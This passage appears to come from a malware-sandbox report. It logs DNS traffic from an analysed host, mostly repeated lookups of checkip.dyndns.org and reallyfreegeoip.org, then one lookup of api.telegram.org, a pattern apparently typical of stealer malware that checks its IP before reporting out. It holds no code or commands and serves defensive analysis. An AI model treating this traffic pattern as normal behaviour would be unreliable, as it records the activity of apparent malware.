                                                                                                            Sep 27, 2024 16:00:57.532093048 CEST5499853192.168.2.228.8.8.8
                                                                                                            Sep 27, 2024 16:00:57.538746119 CEST53549988.8.8.8192.168.2.22
                                                                                                            Sep 27, 2024 16:00:58.180680037 CEST5278153192.168.2.228.8.8.8
                                                                                                            Sep 27, 2024 16:00:58.191021919 CEST53527818.8.8.8192.168.2.22
                                                                                                            Sep 27, 2024 16:00:58.847651005 CEST6392653192.168.2.228.8.8.8
                                                                                                            Sep 27, 2024 16:00:58.855077982 CEST53639268.8.8.8192.168.2.22
                                                                                                            Sep 27, 2024 16:00:58.860909939 CEST6551053192.168.2.228.8.8.8
                                                                                                            Sep 27, 2024 16:00:58.867449045 CEST53655108.8.8.8192.168.2.22
                                                                                                            Sep 27, 2024 16:00:59.366223097 CEST6267253192.168.2.228.8.8.8
                                                                                                            Sep 27, 2024 16:00:59.376847982 CEST53626728.8.8.8192.168.2.22
                                                                                                            Sep 27, 2024 16:01:00.351423025 CEST5647553192.168.2.228.8.8.8
                                                                                                            Sep 27, 2024 16:01:00.357783079 CEST53564758.8.8.8192.168.2.22
                                                                                                            Sep 27, 2024 16:01:00.363251925 CEST4938453192.168.2.228.8.8.8
                                                                                                            Sep 27, 2024 16:01:00.369777918 CEST53493848.8.8.8192.168.2.22
                                                                                                            Sep 27, 2024 16:01:01.051955938 CEST5484253192.168.2.228.8.8.8
                                                                                                            Sep 27, 2024 16:01:01.063899040 CEST53548428.8.8.8192.168.2.22
                                                                                                            Sep 27, 2024 16:01:01.779427052 CEST5810553192.168.2.228.8.8.8
                                                                                                            Sep 27, 2024 16:01:01.786391973 CEST53581058.8.8.8192.168.2.22
                                                                                                            Sep 27, 2024 16:01:01.788894892 CEST6492853192.168.2.228.8.8.8
                                                                                                            Sep 27, 2024 16:01:01.796175957 CEST53649288.8.8.8192.168.2.22
                                                                                                            Sep 27, 2024 16:01:03.292840958 CEST5739053192.168.2.228.8.8.8
                                                                                                            Sep 27, 2024 16:01:03.303739071 CEST53573908.8.8.8192.168.2.22
                                                                                                            Sep 27, 2024 16:01:04.142851114 CEST5809553192.168.2.228.8.8.8
                                                                                                            Sep 27, 2024 16:01:04.149846077 CEST53580958.8.8.8192.168.2.22
                                                                                                            Sep 27, 2024 16:01:04.155329943 CEST5426153192.168.2.228.8.8.8
                                                                                                            Sep 27, 2024 16:01:04.161974907 CEST53542618.8.8.8192.168.2.22
                                                                                                            Sep 27, 2024 16:01:04.162301064 CEST5426153192.168.2.228.8.8.8
                                                                                                            Sep 27, 2024 16:01:04.169006109 CEST53542618.8.8.8192.168.2.22
                                                                                                            Sep 27, 2024 16:01:05.354209900 CEST6050753192.168.2.228.8.8.8
                                                                                                            Sep 27, 2024 16:01:05.361382961 CEST53605078.8.8.8192.168.2.22
                                                                                                            Sep 27, 2024 16:01:05.981267929 CEST5044653192.168.2.228.8.8.8
                                                                                                            Sep 27, 2024 16:01:05.987896919 CEST53504468.8.8.8192.168.2.22
                                                                                                            Sep 27, 2024 16:01:05.990170956 CEST5593953192.168.2.228.8.8.8
                                                                                                            Sep 27, 2024 16:01:05.996714115 CEST53559398.8.8.8192.168.2.22
                                                                                                            Sep 27, 2024 16:01:07.604765892 CEST4960853192.168.2.228.8.8.8
                                                                                                            Sep 27, 2024 16:01:07.611733913 CEST53496088.8.8.8192.168.2.22
                                                                                                            Sep 27, 2024 16:01:08.268337965 CEST6148653192.168.2.228.8.8.8
                                                                                                            Sep 27, 2024 16:01:08.274750948 CEST53614868.8.8.8192.168.2.22

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Sep 27, 2024 16:00:45.470206976 CEST192.168.2.228.8.8.80xe59eStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:45.559868097 CEST192.168.2.228.8.8.80x19bStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:49.489312887 CEST192.168.2.228.8.8.80xa460Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:55.606264114 CEST192.168.2.228.8.8.80x44afStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:55.615405083 CEST192.168.2.228.8.8.80x3145Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:55.827486992 CEST192.168.2.228.8.8.80x3145Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:55.834559917 CEST192.168.2.228.8.8.80x3145Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:56.817902088 CEST192.168.2.228.8.8.80x1d29Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:57.522747993 CEST192.168.2.228.8.8.80x1d19Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:57.532093048 CEST192.168.2.228.8.8.80x4233Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:58.180680037 CEST192.168.2.228.8.8.80x54e1Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:58.847651005 CEST192.168.2.228.8.8.80x5206Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:58.860909939 CEST192.168.2.228.8.8.80xb283Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:59.366223097 CEST192.168.2.228.8.8.80x2e0cStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:00.351423025 CEST192.168.2.228.8.8.80x7032Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:00.363251925 CEST192.168.2.228.8.8.80x50f7Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:01.051955938 CEST192.168.2.228.8.8.80x24f7Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:01.779427052 CEST192.168.2.228.8.8.80x7871Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:01.788894892 CEST192.168.2.228.8.8.80x2d1Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:03.292840958 CEST192.168.2.228.8.8.80x7afcStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:04.142851114 CEST192.168.2.228.8.8.80x760fStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:04.155329943 CEST192.168.2.228.8.8.80xa629Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:04.162301064 CEST192.168.2.228.8.8.80xa629Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:05.354209900 CEST192.168.2.228.8.8.80xc9a5Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:05.981267929 CEST192.168.2.228.8.8.80x6eedStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:05.990170956 CEST192.168.2.228.8.8.80x7de2Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:07.604765892 CEST192.168.2.228.8.8.80x5102Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:08.268337965 CEST192.168.2.228.8.8.80xd212Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Sep 27, 2024 16:00:45.476576090 CEST8.8.8.8192.168.2.220xe59eNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:45.476576090 CEST8.8.8.8192.168.2.220xe59eNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:45.476576090 CEST8.8.8.8192.168.2.220xe59eNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:45.476576090 CEST8.8.8.8192.168.2.220xe59eNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:45.476576090 CEST8.8.8.8192.168.2.220xe59eNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:45.476576090 CEST8.8.8.8192.168.2.220xe59eNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:45.567013025 CEST8.8.8.8192.168.2.220x19bNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:45.567013025 CEST8.8.8.8192.168.2.220x19bNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:45.567013025 CEST8.8.8.8192.168.2.220x19bNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:45.567013025 CEST8.8.8.8192.168.2.220x19bNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:45.567013025 CEST8.8.8.8192.168.2.220x19bNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:45.567013025 CEST8.8.8.8192.168.2.220x19bNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:49.500715017 CEST8.8.8.8192.168.2.220xa460No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:49.500715017 CEST8.8.8.8192.168.2.220xa460No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:55.612976074 CEST8.8.8.8192.168.2.220x44afNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:55.612976074 CEST8.8.8.8192.168.2.220x44afNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:55.612976074 CEST8.8.8.8192.168.2.220x44afNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:55.612976074 CEST8.8.8.8192.168.2.220x44afNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:55.612976074 CEST8.8.8.8192.168.2.220x44afNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:55.612976074 CEST8.8.8.8192.168.2.220x44afNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:55.827063084 CEST8.8.8.8192.168.2.220x3145No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:55.827063084 CEST8.8.8.8192.168.2.220x3145No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:55.827063084 CEST8.8.8.8192.168.2.220x3145No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:55.827063084 CEST8.8.8.8192.168.2.220x3145No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:55.827063084 CEST8.8.8.8192.168.2.220x3145No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:55.827063084 CEST8.8.8.8192.168.2.220x3145No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:55.834384918 CEST8.8.8.8192.168.2.220x3145No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:55.834384918 CEST8.8.8.8192.168.2.220x3145No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:55.834384918 CEST8.8.8.8192.168.2.220x3145No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:55.834384918 CEST8.8.8.8192.168.2.220x3145No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:55.834384918 CEST8.8.8.8192.168.2.220x3145No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:55.834384918 CEST8.8.8.8192.168.2.220x3145No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:55.841358900 CEST8.8.8.8192.168.2.220x3145No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:55.841358900 CEST8.8.8.8192.168.2.220x3145No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:55.841358900 CEST8.8.8.8192.168.2.220x3145No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:55.841358900 CEST8.8.8.8192.168.2.220x3145No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:55.841358900 CEST8.8.8.8192.168.2.220x3145No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:55.841358900 CEST8.8.8.8192.168.2.220x3145No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:56.825115919 CEST8.8.8.8192.168.2.220x1d29No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:56.825115919 CEST8.8.8.8192.168.2.220x1d29No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:57.529438019 CEST8.8.8.8192.168.2.220x1d19No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:57.529438019 CEST8.8.8.8192.168.2.220x1d19No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:57.529438019 CEST8.8.8.8192.168.2.220x1d19No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:57.529438019 CEST8.8.8.8192.168.2.220x1d19No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:57.529438019 CEST8.8.8.8192.168.2.220x1d19No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:57.529438019 CEST8.8.8.8192.168.2.220x1d19No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:57.538746119 CEST8.8.8.8192.168.2.220x4233No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:57.538746119 CEST8.8.8.8192.168.2.220x4233No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:57.538746119 CEST8.8.8.8192.168.2.220x4233No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:57.538746119 CEST8.8.8.8192.168.2.220x4233No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:57.538746119 CEST8.8.8.8192.168.2.220x4233No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:57.538746119 CEST8.8.8.8192.168.2.220x4233No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:58.191021919 CEST8.8.8.8192.168.2.220x54e1No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:58.191021919 CEST8.8.8.8192.168.2.220x54e1No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:58.855077982 CEST8.8.8.8192.168.2.220x5206No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:58.855077982 CEST8.8.8.8192.168.2.220x5206No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:58.855077982 CEST8.8.8.8192.168.2.220x5206No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:58.855077982 CEST8.8.8.8192.168.2.220x5206No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:58.855077982 CEST8.8.8.8192.168.2.220x5206No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:58.855077982 CEST8.8.8.8192.168.2.220x5206No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:58.867449045 CEST8.8.8.8192.168.2.220xb283No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:58.867449045 CEST8.8.8.8192.168.2.220xb283No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:58.867449045 CEST8.8.8.8192.168.2.220xb283No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:58.867449045 CEST8.8.8.8192.168.2.220xb283No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:58.867449045 CEST8.8.8.8192.168.2.220xb283No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:58.867449045 CEST8.8.8.8192.168.2.220xb283No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:59.376847982 CEST8.8.8.8192.168.2.220x2e0cNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:00:59.376847982 CEST8.8.8.8192.168.2.220x2e0cNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:00.357783079 CEST8.8.8.8192.168.2.220x7032No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:00.357783079 CEST8.8.8.8192.168.2.220x7032No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:00.357783079 CEST8.8.8.8192.168.2.220x7032No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:00.357783079 CEST8.8.8.8192.168.2.220x7032No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:00.357783079 CEST8.8.8.8192.168.2.220x7032No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:00.357783079 CEST8.8.8.8192.168.2.220x7032No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:00.369777918 CEST8.8.8.8192.168.2.220x50f7No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:00.369777918 CEST8.8.8.8192.168.2.220x50f7No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:00.369777918 CEST8.8.8.8192.168.2.220x50f7No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:00.369777918 CEST8.8.8.8192.168.2.220x50f7No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:00.369777918 CEST8.8.8.8192.168.2.220x50f7No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:00.369777918 CEST8.8.8.8192.168.2.220x50f7No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:01.063899040 CEST8.8.8.8192.168.2.220x24f7No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:01.063899040 CEST8.8.8.8192.168.2.220x24f7No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:01.786391973 CEST8.8.8.8192.168.2.220x7871No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:01.786391973 CEST8.8.8.8192.168.2.220x7871No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:01.786391973 CEST8.8.8.8192.168.2.220x7871No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:01.786391973 CEST8.8.8.8192.168.2.220x7871No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:01.786391973 CEST8.8.8.8192.168.2.220x7871No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:01.786391973 CEST8.8.8.8192.168.2.220x7871No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:01.796175957 CEST8.8.8.8192.168.2.220x2d1No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:01.796175957 CEST8.8.8.8192.168.2.220x2d1No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:01.796175957 CEST8.8.8.8192.168.2.220x2d1No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:01.796175957 CEST8.8.8.8192.168.2.220x2d1No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:01.796175957 CEST8.8.8.8192.168.2.220x2d1No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:01.796175957 CEST8.8.8.8192.168.2.220x2d1No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:03.303739071 CEST8.8.8.8192.168.2.220x7afcNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:03.303739071 CEST8.8.8.8192.168.2.220x7afcNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:04.149846077 CEST8.8.8.8192.168.2.220x760fNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:04.149846077 CEST8.8.8.8192.168.2.220x760fNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:04.149846077 CEST8.8.8.8192.168.2.220x760fNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:04.149846077 CEST8.8.8.8192.168.2.220x760fNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:04.149846077 CEST8.8.8.8192.168.2.220x760fNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:04.149846077 CEST8.8.8.8192.168.2.220x760fNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:04.161974907 CEST8.8.8.8192.168.2.220xa629No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:04.161974907 CEST8.8.8.8192.168.2.220xa629No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:04.161974907 CEST8.8.8.8192.168.2.220xa629No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:04.161974907 CEST8.8.8.8192.168.2.220xa629No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:04.161974907 CEST8.8.8.8192.168.2.220xa629No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:04.161974907 CEST8.8.8.8192.168.2.220xa629No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:04.169006109 CEST8.8.8.8192.168.2.220xa629No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:04.169006109 CEST8.8.8.8192.168.2.220xa629No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:04.169006109 CEST8.8.8.8192.168.2.220xa629No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:04.169006109 CEST8.8.8.8192.168.2.220xa629No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:04.169006109 CEST8.8.8.8192.168.2.220xa629No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:04.169006109 CEST8.8.8.8192.168.2.220xa629No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:05.361382961 CEST8.8.8.8192.168.2.220xc9a5No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:05.361382961 CEST8.8.8.8192.168.2.220xc9a5No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:05.987896919 CEST8.8.8.8192.168.2.220x6eedNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:05.987896919 CEST8.8.8.8192.168.2.220x6eedNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:05.987896919 CEST8.8.8.8192.168.2.220x6eedNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:05.987896919 CEST8.8.8.8192.168.2.220x6eedNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:05.987896919 CEST8.8.8.8192.168.2.220x6eedNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:05.987896919 CEST8.8.8.8192.168.2.220x6eedNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:05.996714115 CEST8.8.8.8192.168.2.220x7de2No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Sep 27, 2024 16:01:05.996714115 CEST8.8.8.8192.168.2.220x7de2No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
